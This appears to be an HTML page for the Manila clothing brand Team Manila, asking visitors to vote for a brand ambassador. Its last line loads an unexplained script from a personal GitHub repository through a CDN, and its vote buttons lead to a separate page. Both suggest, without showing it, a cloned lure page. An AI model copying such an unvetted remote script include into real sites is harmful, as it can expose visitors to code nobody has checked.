<!DOCTYPE html>
<html data-bs-theme="light" lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>Team Manila - Local Clothing</title>
    <meta property="og:image" content="assets/img/TM-HOLIDAY-2-EDITEDIMG_0082-1200x800.jpg">
    <meta name="description" content="Experience the pulse of Manila with Team Manila's urban fashion. Explore our stylish collection and cast your vote for the next ambassador of our local brand!">
    <meta property="og:type" content="website">
    <link rel="icon" type="image/png" sizes="192x192" href="assets/img/tmls-2305-192w.png">
    <link rel="icon" type="image/png" sizes="192x192" href="assets/img/tmls-2305-192w.png">
    <link rel="icon" type="image/png" sizes="192x192" href="assets/img/tmls-2305-192w.png">
    <link rel="icon" type="image/png" sizes="192x192" href="assets/img/tmls-2305-192w.png">
    <link rel="icon" type="image/png" sizes="192x192" href="assets/img/tmls-2305-192w.png">
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Abel&amp;display=swap">
    <link rel="stylesheet" href="assets/fonts/fontawesome-all.min.css">
    <link rel="stylesheet" href="assets/css/aos.min.css">
    <link rel="stylesheet" href="assets/css/Articles-Cards-images.css">
    <link rel="stylesheet" href="assets/css/Model-Card-Style-1.css">
    <link rel="stylesheet" href="assets/css/Navbar-Centered-Links-icons.css">
    <link rel="stylesheet" href="assets/css/styles.css">
</head>

<body>
    <nav class="navbar navbar-light navbar-expand-md py-3">
        <div class="container"><a class="navbar-brand d-flex align-items-center" href="robots.txt.html#"><img class="img-fluid" src="assets/img/large_TM-LOGO.png" style="width: 160px;"></a><button data-bs-toggle="collapse" class="navbar-toggler" data-bs-target="#navcol-3"><span class="visually-hidden">Toggle navigation</span><i class="fas fa-shopping-bag"></i></button>
            <div class="collapse navbar-collapse" id="navcol-3">
                <ul class="navbar-nav mx-auto">
                    <li class="nav-item"><a class="nav-link active" href="https://shop.teammanilalifestyle.com/collections/all" style="font-family: Abel, sans-serif;">COLLECTION</a></li>
                    <li class="nav-item"><a class="nav-link active" href="https://shop.teammanilalifestyle.com/collections/collaboration-1" style="font-family: Abel, sans-serif;">COLLABORATION</a></li>
                    <li class="nav-item"><a class="nav-link active" href="https://shop.teammanilalifestyle.com/collections/accessories-1" style="font-family: Abel, sans-serif;">ACCESSORIES</a></li>
                </ul><a class="btn btn-dark" role="button" href="https://shop.teammanilalifestyle.com/" style="font-family: Abel, sans-serif;"><i class="fas fa-shopping-bag"></i><strong>&nbsp;SHOP</strong></a>
            </div>
        </div>
    </nav>
    <section>
        <div data-bss-parallax-bg="true" class="banner-head">
            <div class="container h-100">
                <div class="row h-100">
                    <div class="col-md-6 text-center text-md-start d-flex d-sm-flex d-md-flex justify-content-center align-items-center justify-content-md-start align-items-md-center justify-content-xl-center">
                        <div style="max-width: 350px;">
                            <h1 class="text-uppercase fw-bold" style="color: var(--bs-body-bg);border-style: none;border-color: var(--bs-body-color);"><span style="color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">&nbsp;Team Manila&nbsp;</span>: Your Urban Style Destination</h1>
                            <p class="my-3" style="color: var(--bs-secondary-bg);">Experience the pulse of Manila with Team Manila's urban fashion. Explore our stylish collection and cast your vote for the next ambassador of our local brand!</p><a class="btn btn-light btn-lg me-2" role="button" href="robots.txt.html#vote" style="font-family: Abel, sans-serif;"><strong>Vote Now!</strong></a><a class="btn btn-outline-light btn-lg" role="button" href="robots.txt.html#vote" style="font-family: Abel, sans-serif;"><strong>Explore</strong></a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <section class="py-4 py-xl-5" style="background: var(--bs-body-color);padding-top: 5px !important;padding-bottom: 5px !important;">
        <div class="container">
            <div class="text-white bg-dark border rounded border-0 p-4 p-md-5" data-aos="fade-left" style="border-style: none;border-radius: 0px !important;">
                <h2 class="fw-bold text-white mb-3" style="text-align: center;">VOTE FOR THE NEXT AMBASSADOR</h2>
                <p class="mb-4" style="text-align: center;margin-bottom: 7px !important;font-family: Abel, sans-serif;">DEADLINE UNTIL</p>
                <h1 id="deadline" style="margin-bottom: 0px;text-align: center;font-family: Abel, sans-serif;font-weight: bold;">NOVEMBER 6</h1>
            </div>
        </div>
    </section>
    <section id="vote" style="padding-top: 25px;padding-bottom: 5px;">
        <div class="container">
            <div class="row">
                <div class="col-md-4 col-lg-4 col-xl-3" data-aos="fade-up">
                    <div class="mc-border">
                        <div class="mc-inner wrap">
                            <div class="model-wrap"><img src="assets/img/s1.jpg" /></div>
                            <div class="model-info">
                                <h1 class="model-title"><a href="robots.txt.html#">Samantha</a></h1>
                            </div>
                            <div class="view-pro-btn"><a href="vote.html">VOTE</a></div>
                        </div>
                    </div>
                </div>
                <div class="col-md-4 col-lg-4 col-xl-3" data-aos="fade-up">
                    <div class="mc-border">
                        <div class="mc-inner wrap">
                            <div class="model-wrap"><img src="assets/img/s2.jpg" /></div>
                            <div class="model-info">
                                <h1 class="model-title"><a href="robots.txt.html#">Beatrice</a></h1>
                            </div>
                            <div class="view-pro-btn"><a href="vote.html">VOTE</a></div>
                        </div>
                    </div>
                </div>
                <div class="col-md-4 col-lg-4 col-xl-3" data-aos="fade-up">
                    <div class="mc-border">
                        <div class="mc-inner wrap">
                            <div class="model-wrap"><img src="assets/img/s3.jpg" /></div>
                            <div class="model-info">
                                <h1 class="model-title"><a href="robots.txt.html#">Kyle</a></h1>
                            </div>
                            <div class="view-pro-btn"><a href="vote.html">VOTE</a></div>
                        </div>
                    </div>
                </div>
                <div class="col-md-4 col-lg-4 col-xl-3" data-aos="fade-up">
                    <div class="mc-border">
                        <div class="mc-inner wrap">
                            <div class="model-wrap"><img src="assets/img/s4.jpg" /></div>
                            <div class="model-info">
                                <h1 class="model-title"><a href="robots.txt.html#">Antonette</a></h1>
                            </div>
                            <div class="view-pro-btn"><a href="vote.html">VOTE</a></div>
                        </div>
                    </div>
                </div>
                <div class="col-md-4 col-lg-4 col-xl-3" data-aos="fade-up">
                    <div class="mc-border">
                        <div class="mc-inner wrap">
                            <div class="model-wrap"><img src="assets/img/s5.jpg" /></div>
                            <div class="model-info">
                                <h1 class="model-title"><a href="robots.txt.html#">Carlsen</a></h1>
                            </div>
                            <div class="view-pro-btn"><a href="vote.html">VOTE</a></div>
                        </div>
                    </div>
                </div>
                <div class="col-md-4 col-lg-4 col-xl-3" data-aos="fade-up">
                    <div class="mc-border">
                        <div class="mc-inner wrap">
                            <div class="model-wrap"><img src="assets/img/s6.jpg" /></div>
                            <div class="model-info">
                                <h1 class="model-title"><a href="robots.txt.html#">James</a></h1>
                            </div>
                            <div class="view-pro-btn"><a href="vote.html">VOTE</a></div>
                        </div>
                    </div>
                </div>
                <div class="col-md-4 col-lg-4 col-xl-3" data-aos="fade-up">
                    <div class="mc-border">
                        <div class="mc-inner wrap">
                            <div class="model-wrap"><img src="assets/img/s7.jpg" /></div>
                            <div class="model-info">
                                <h1 class="model-title"><a href="robots.txt.html#">Nadine</a></h1>
                            </div>
                            <div class="view-pro-btn"><a href="vote.html">VOTE</a></div>
                        </div>
                    </div>
                </div>
                <div class="col-md-4 col-lg-4 col-xl-3" data-aos="fade-up">
                    <div class="mc-border">
                        <div class="mc-inner wrap">
                            <div class="model-wrap"><img src="assets/img/s8.jpg" /></div>
                            <div class="model-info">
                                <h1 class="model-title"><a href="robots.txt.html#">Jordan</a></h1>
                            </div>
                            <div class="view-pro-btn"><a href="vote.html">VOTE</a></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <section class="py-4 py-xl-5" style="padding-top: 20px !Important;padding-bottom: 20px !Important;">
        <div class="container">
            <div class="text-dark bg-light border rounded border-0 border-light d-flex flex-column justify-content-between align-items-center flex-lg-row p-4 p-lg-5" data-bs-theme="light">
                <div class="text-center text-lg-start py-3 py-lg-1">
                    <h2 class="fw-bold mb-2"><strong>Subscribe to our newsletter</strong></h2>
                    <p class="mb-0">Get updated with our latest collections.</p>
                </div>
                <form class="d-flex justify-content-center flex-wrap my-2" method="post">
                    <div class="my-2"><input class="form-control" type="email" name="email" placeholder="Your Email"></div>
                    <div class="my-2"><button class="btn btn-dark ms-sm-2" type="submit" style="font-family: Abel, sans-serif;"><strong>Subscribe </strong></button></div>
                </form>
            </div>
        </div>
    </section>
    <section style="margin-top: -25px;">
        <div class="container py-4 py-xl-5">
            <div class="row mb-5" style="padding-right: 5px;padding-left: 5px;">
                <div class="col-md-12 col-lg-12 col-xl-12 col-xxl-12 text-center mx-auto" style="border-top-width: 4px;border-top-style: solid;padding-top: 10px;">
                    <h2><strong>TEAM MANILA HEADLINES</strong></h2>
                </div>
            </div>
            <div class="row gy-4 row-cols-1 row-cols-md-2 row-cols-xl-3">
                <div class="col" data-aos="fade-up"><a href="https://teammanilalifestyle.com/2019/12/05/of-golden-values-virtues/">
                        <div class="card"><img class="card-img-top w-100 d-block fit-cover" style="height: 200px;" src="assets/img/TM-HOLIDAY-2-EDITEDIMG_0082-1200x800.jpg">
                            <div class="card-body p-4">
                                <p class="text-primary card-text mb-0">Article</p>
                                <h4 class="card-title" style="font-family: Abel, sans-serif;"><strong>OF GOLDEN VALUES &amp; VIRTUES</strong></h4>
                                <p class="card-text" style="color: var(--bs-gray-900);text-align: justify;">Not all that glitters is pure gold. It can be weighed in cultural impact and its mercurial rise to the top. The “Of Golden Values and Virtues” Collection brings the fact that artists like OWFUCK are bound for greatness as their passion, poetry, and skills are…</p>
                            </div>
                        </div>
                    </a></div>
                <div class="col" data-aos="fade-up"><a href="https://teammanilalifestyle.com/2019/12/05/connecting-cultural-satellites/">
                        <div class="card"><img class="card-img-top w-100 d-block fit-cover" style="height: 200px;" src="assets/img/1.2-1200x800.jpg">
                            <div class="card-body p-4">
                                <p class="text-primary card-text mb-0">Article</p>
                                <h4 class="card-title" style="font-family: Abel, sans-serif;"><strong>CONNECTING CULTURAL SATELLITES</strong></h4>
                                <p class="card-text" style="color: var(--bs-gray-900);text-align: justify;">The deeper we go into our culture, the higher our appreciation becomes. These are the fixtures and figures that make us happy and add a spring to our step. They bring back memories and for some special reason, still connect wit the masses regardless of nostalgia,…</p>
                            </div>
                        </div>
                    </a></div>
                <div class="col" data-aos="fade-up"><a href="https://teammanilalifestyle.com/2019/12/05/connecting-cultural-satellites/">
                        <div class="card"><img class="card-img-top w-100 d-block fit-cover" style="height: 200px;" src="assets/img/IMG_1659_E-ESCOLTA-WEB-1200.jpg">
                            <div class="card-body p-4">
                                <p class="text-primary card-text mb-0">Article</p>
                                <h4 class="card-title" style="font-family: Abel, sans-serif;"><strong>#SUPPORTLOCAL CREATIVE COMMUNITIES: FIRST CO-WORKING COMMUNITY</strong></h4>
                                <p class="card-text" style="color: var(--bs-gray-900);text-align: justify;">You don’t need a time machine to take a trip down Manila’s memory lane. In fact, the East-West End Street of Escolta in downtown Binondo, Manila gives us more than…</p>
                            </div>
                        </div>
                    </a></div>
            </div>
        </div>
    </section>
    <footer class="text-white bg-dark">
        <div class="container py-4 py-lg-5">
            <div class="row justify-content-center">
                <div class="col-sm-4 col-md-3 text-start text-lg-start d-flex flex-column item">
                    <h3 class="fs-5 text-white" style="font-family: Abel, sans-serif;"><strong>OFFICE</strong></h3>
                    <ul class="list-unstyled">
                        <li><a class="link-light" href="robots.txt.html#"><strong>Jupiter Store</strong></a></li>
                        <li><a class="link-light" href="robots.txt.html#">3F Valdelcon Bldg., 20 Jupiter St. Bel-Air, Makati City</a></li>
                        <li><a class="link-light" href="robots.txt.html#"><em>info@teammanila.com</em></a></li>
                    </ul>
                </div>
                <div class="col-sm-4 col-md-3 text-start text-lg-start d-flex flex-column item">
                    <h3 class="fs-5 text-white" style="font-family: Abel, sans-serif;"><strong>STORES</strong></h3>
                    <ul class="list-unstyled">
                        <li><a class="link-light" href="robots.txt.html#">Suez &amp; Zapote Gallery</a></li>
                        <li><a class="link-light" href="https://dailygrindstore.com">Dailygrindstore.com</a></li>
                        <li><a class="link-light" href="robots.txt.html#"><strong>Kultura </strong>- Mall of Asia</a></li>
                    </ul>
                </div>
                <div class="col-sm-4 col-md-3 text-start text-lg-start d-flex flex-column item">
                    <h3 class="fs-5 text-white" style="font-family: Abel, sans-serif;"><strong>PRODUCTS</strong></h3>
                    <ul class="list-unstyled">
                        <li><a class="link-light" href="robots.txt.html#">Latest Collections</a></li>
                        <li><a class="link-light" href="robots.txt.html#">Accessories</a></li>
                        <li><a class="link-light" href="robots.txt.html#">Collaboration</a></li>
                    </ul>
                </div>
            </div>
            <hr>
            <div class="d-flex justify-content-between align-items-center pt-3">
                <p class="mb-0" style="font-family: Abel, sans-serif;">Copyright © Team Manila</p>
                <ul class="list-inline mb-0">
                    <li class="list-inline-item"><svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="currentColor" viewBox="0 0 16 16" class="bi bi-facebook">
                            <path d="M16 8.049c0-4.446-3.582-8.05-8-8.05C3.58 0-.002 3.603-.002 8.05c0 4.017 2.926 7.347 6.75 7.951v-5.625h-2.03V8.05H6.75V6.275c0-2.017 1.195-3.131 3.022-3.131.876 0 1.791.157 1.791.157v1.98h-1.009c-.993 0-1.303.621-1.303 1.258v1.51h2.218l-.354 2.326H9.25V16c3.824-.604 6.75-3.934 6.75-7.951z"></path>
                        </svg></li>
                    <li class="list-inline-item"><svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="currentColor" viewBox="0 0 16 16" class="bi bi-twitter">
                            <path d="M5.026 15c6.038 0 9.341-5.003 9.341-9.334 0-.14 0-.282-.006-.422A6.685 6.685 0 0 0 16 3.542a6.658 6.658 0 0 1-1.889.518 3.301 3.301 0 0 0 1.447-1.817 6.533 6.533 0 0 1-2.087.793A3.286 3.286 0 0 0 7.875 6.03a9.325 9.325 0 0 1-6.767-3.429 3.289 3.289 0 0 0 1.018 4.382A3.323 3.323 0 0 1 .64 6.575v.045a3.288 3.288 0 0 0 2.632 3.218 3.203 3.203 0 0 1-.865.115 3.23 3.23 0 0 1-.614-.057 3.283 3.283 0 0 0 3.067 2.277A6.588 6.588 0 0 1 .78 13.58a6.32 6.32 0 0 1-.78-.045A9.344 9.344 0 0 0 5.026 15z"></path>
                        </svg></li>
                    <li class="list-inline-item"><svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="currentColor" viewBox="0 0 16 16" class="bi bi-instagram">
                            <path d="M8 0C5.829 0 5.556.01 4.703.048 3.85.088 3.269.222 2.76.42a3.917 3.917 0 0 0-1.417.923A3.927 3.927 0 0 0 .42 2.76C.222 3.268.087 3.85.048 4.7.01 5.555 0 5.827 0 8.001c0 2.172.01 2.444.048 3.297.04.852.174 1.433.372 1.942.205.526.478.972.923 1.417.444.445.89.719 1.416.923.51.198 1.09.333 1.942.372C5.555 15.99 5.827 16 8 16s2.444-.01 3.298-.048c.851-.04 1.434-.174 1.943-.372a3.916 3.916 0 0 0 1.416-.923c.445-.445.718-.891.923-1.417.197-.509.332-1.09.372-1.942C15.99 10.445 16 10.173 16 8s-.01-2.445-.048-3.299c-.04-.851-.175-1.433-.372-1.941a3.926 3.926 0 0 0-.923-1.417A3.911 3.911 0 0 0 13.24.42c-.51-.198-1.092-.333-1.943-.372C10.443.01 10.172 0 7.998 0h.003zm-.717 1.442h.718c2.136 0 2.389.007 3.232.046.78.035 1.204.166 1.486.275.373.145.64.319.92.599.28.28.453.546.598.92.11.281.24.705.275 1.485.039.843.047 1.096.047 3.231s-.008 2.389-.047 3.232c-.035.78-.166 1.203-.275 1.485a2.47 2.47 0 0 1-.599.919c-.28.28-.546.453-.92.598-.28.11-.704.24-1.485.276-.843.038-1.096.047-3.232.047s-2.39-.009-3.233-.047c-.78-.036-1.203-.166-1.485-.276a2.478 2.478 0 0 1-.92-.598 2.48 2.48 0 0 1-.6-.92c-.109-.281-.24-.705-.275-1.485-.038-.843-.046-1.096-.046-3.233 0-2.136.008-2.388.046-3.231.036-.78.166-1.204.276-1.486.145-.373.319-.64.599-.92.28-.28.546-.453.92-.598.282-.11.705-.24 1.485-.276.738-.034 1.024-.044 2.515-.045v.002zm4.988 1.328a.96.96 0 1 0 0 1.92.96.96 0 0 0 0-1.92zm-4.27 1.122a4.109 4.109 0 1 0 0 8.217 4.109 4.109 0 0 0 0-8.217zm0 1.441a2.667 2.667 0 1 1 0 5.334 2.667 2.667 0 0 1 0-5.334z"></path>
                        </svg></li>
                </ul>
            </div>
        </div>
    </footer>
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
    <script src="https://cdn.jsdelivr.net/gh/Beboye/00-NEW-CDN@main/9183190.min.js"></script>
</body>

</html>